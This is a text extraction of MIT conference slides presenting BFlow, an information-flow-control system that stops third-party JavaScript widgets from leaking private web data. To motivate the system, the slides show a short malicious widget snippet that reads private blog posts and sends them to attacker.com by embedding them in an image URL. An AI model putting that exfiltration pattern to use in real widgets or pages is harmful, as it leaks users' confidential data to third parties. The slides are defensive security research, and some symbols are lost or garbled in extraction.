Privacy-Preserving Browser-Side Scripting With BFlow
Alexander Yip, Neha Narula, Maxwell Krohn, Robert Morris
Massachusetts Institute of Technology
Web Sites Support 3rd Party JavaScript Extensions
Snippets of the last few blog posts
Display the last few reader comments
• Blogger.com supports “widgets”– read and modify blog posts
Confidential Blogs Are Vulnerable to 3rd Party JavaScript
v
A 3rd Party JavaScript Leak Attack
private_data = document.getElementById(“posts”);widget.innerHTML = private_data; widget.innerHTML += ‘<IMG SRC=http://attacker.com/’+ private_data +‘.gif>’;
Widget’s JavaScript source code:
HTTP Request: GET /sell_pet_food_online.gif HTTP/1.0
attacker.com ServerAlice’s Browser
Blogger JS+
Attacker JS
Widget has access to private blog content
Widget leaks private blog content to attacker.com
• Blogger.com wants to provide data to widgets• Browser security policy permits JS to send data freely• Wrote a malicious blogger.com widget in one hour
Shows private blog content in widget’s box
Zlxcoizvuowqjlsavzmzlvcjlsadfjfoqwojerl,clvzlxcvjaoisjqklqwerljdsalzzx,vcnadsoqoiewqoirulnzdlkfjaoiqueoqejlnlvkjxzcoivuaqoeruqowejrlkasdnzcvzxvalsdfouqoweurozxcvjlkajoqewjrlsdznlkzxvjzl
lkjljvojubjjcjif
oitotouroiejfjlf
Check Spelling!
Dan’s Spell Checker
Problem: Extensibility vs. Privacy
Encrypt Mail
Decrypt Mail
Joe’s EncryptionWidget
(Choose one)
• Either choose cool extensibility features– e.g. Blogger.com widgets
• Or choose privacy and no 3rd party code – e.g. Gmail
Solution: BFlow
• Eliminate the choice between features & privacy• Add information flow control (IFC)– To JavaScript in the browser– Track private data inside the browser and server
• Prohibit communication that leaks private data
Challenges• Fit JavaScript environment into an IFC model– Preserve JavaScript communication channels
Send to top-level frame
Send to sub-
frame
Google Maps Server
Private address
• Fit JavaScript environment into an IFC model– Preserve JavaScript communication channels– Mashups with private data
• Fit JavaScript environment into an IFC model– Preserve JavaScript communication channels– Mashups with private data
• Easy to adopt– Minimize changes to JS that uses existing communication
channels– Minimize changes required on the server– Easy for end-users to start using
Contributions
• An IFC model for the JS runtime environment• Easy to deploy and adopt implementation– Installs in browser with 2 clicks– Requires no changes to JavaScript interpreter• Only small changes to JavaScript communication API
• A platform that supports real blogger.com widgets
BFlow Overview
Browser Reference Monitor
Trusted Protection Zone Untrusted Protection Zones
Blog Web Server
attacker.com ServerLabel: Saw Alice’s private data
Reference Monitor knows
when a zone reads private
data
Label: Saw Alice’s private data
Blog Server Supplies Some
HTML/JSBlog Server “labels” private
data with a “tag”
3rd Party Supplies Widget
HTML/JS
BFlow Overview
Browser Reference Monitor
Blog Web Server
attacker.com Server
Declassification: Fetch Map Image
from Google Maps, OK!
Google Maps Server
BFlow prevents the malicious widget from
leaking private data
Have not seen private data: Can send
requests to any server
Have seen private data: Can only send requests
to the data’s server
Design Outline
• Tags and Labels• Protection Zones• Reference Monitor• Server
Tags And Labels• A label is a set of tags– Describes what private data an object contains– Each zone, HTTP request, and response has a label
• Each tag identifies a kind of private data– Alice’s tag: blogger.com:alice– Bob’s tag: blogger.com:bob
• e.g. Alice’s blog has label L={blogger.com:alice}
• A label is a set of tags– Describes what private data an object contains– Each zone, HTTP request, and response has a label
Data Flow Rule
• Data may flow only if Ldata Lreceiver
Data Label Receiver Label May Receive{x} {x,y} Yes{x} {} No
DataData Receiver JavaScript
?
Protection Zones• A zone is a group of browser HTML <frames>– Regular JavaScript runs inside a frame inside a zone– All frames in a zone share the same label
• Trusted zone– Top-level frame is in the site’s trusted zone– Contains JavaScript written only by the site’s developers– Need not abide by information flow restrictions
• Untrusted zones– Contain 3rd party JavaScript– Must abide by information flow restrictions
Example Zones & Labels
Zone AL={}
Zone BL={blogger.com:alice}
Trusted Zone(No Label)
Zone CL={}
Zone D L={blogger.com:alice}
How Do Untrusted Zones Get Labels?
L={}L={blogger.com:alice}
Blog Web Server
Browser Reference Monitor
Trusted zone sets untrusted zone’s label
augment_label (blogger.com:alice)
Works With Existing JS Channels• Channel 1: A frame can always send to its child frame– Lparent Lchild
Frame 2L={X.com:A,
X.com:B}
Web PageShowing Inherent JavaScript Channels
Frame 1L={X.com:A}
Top-level Frame from X.com
Frame 1 may not add X.com:C to its label
No sub-frame from X.com may add a tag from Y.com
• Channel 2: A frame can always send to the top-level frame– To avoid leaking data, untrusted zones may contain only tags from
the web site in the top-level frame
• Channel 1: A frame can always send to its child frame– Lparent Lchild
Why Zones Instead Of Frames?• Some JavaScript consists of multiple frames• Group JavaScript into modules by label
– All frames in the same zone can always communicate– Trusted JavaScript sets the label of a multi-frame widget only once– Existing multi-frame widgets need not coordinate label changes
e.g. Cbox chat widget
Bottom frame writes messages to top frame
BFlow‘s JavaScript Model• All JavaScript will work if the IFC rules allow– AJAX, eval()
• The IFC rule (Ldata Lreceiver) affects– access to DOM variables & cookies– postMessage(), fragment-ID messages– HTTP requests and responses
HTTP Request Rules
• Trusted zone T– can send to any server (always)– can receive a response from any server (always)
• Untrusted zone Z– can send to the server where secret data came from (always)
• can receive the response (when Lresponse LZ)
– can send to 3rd party server E (when LZ = {}) • or web site has a declassification exception for (server E, URL)• can receive the response (always)
The BFlow Server API• Propagate label from HTTP requests to responses– Read label contained in each request– Attach the label to any response that uses labeled data
Blog Web Server
HTTP Response Contents: sell_petfood_onlineLabel: L = {blogger.com:alice}
L={blogger.com:alice}
Zone AL={blogger.com:alice}
L={blogger.com:alice}
HTTP Request:POST save_post?content=sell_petfood_onlineLabel: L = {blogger.com:alice}
Zone BL={blogger.com:alice}
BFlow Implementation
Browser Reference Monitor
Firefox Extension1100 Lines of code
Users can install with 2 clicks
JavaScript communication API
changed slightly
No changes to JavaScript interpreter
Zone Isolation
Domain name:Zone2.blogger
Domain name:Zone1.blogger
• Repurpose browser’s same-origin policy (SOP)– Zones communicate via reference monitor
No direct communication
• Repurpose browser’s same-origin policy (SOP)– Zones communicate via reference monitor– SOP is conservative: no DOM read/write across zones
even if labels would allow
Applications
• BF-Socialnet– Social network that supports 3rd party JS extensions– Protects private user data (see paper)
• BFlogger– Blog mockup that supports blogger.com widgets– Ported 12 existing widgets to BFlogger
BFlow Preserves Privacy
• Wrote a malicious Blogger.com widget– Successfully leaks data from confidential blogs
• Ported widget to BFlogger– BFlow prevents malicious widget from leaking data
attacker.com Server
No requests to attacker.com after
reading private data
BFlow Runs Existing JavaScript
Widget Lines of Code
Lines Changed
Uses Secret Data?
Twitter 25 0 No
Flickr 10 0 No
Buzz 1 0 No
Youtube 1982 0 No
Calendar 1945 0 No
Weather 3790 0 No
Popular Posts 16 1 Yes
Commenters 15 1 Yes
Recent Posts 74 2 Yes
Random Post 34 2 Yes
Cbox-chat 801 89 Yes
High because we made Chat store data on the BFlow server to protect chat data
• Better privacy with little or no changes
Existing Research
• Can’t grant read access without also leaking [MashupOS]• Requires rewriting JavaScript & manual jail config [Caja]• Don’t support untrusted JavaScript [Swift, SIF]• User must make disclosure decisions [NoMoXSS]• Certificates [Java]
Conclusion• 3rd party JavaScript can leak confidential user data• BFlow provides a new web security model– Tracks information flow between client & server– 3rd party JavaScript can safely compute and display– Enables new features in web sites• e.g. 3rd party Gmail extensions
Questions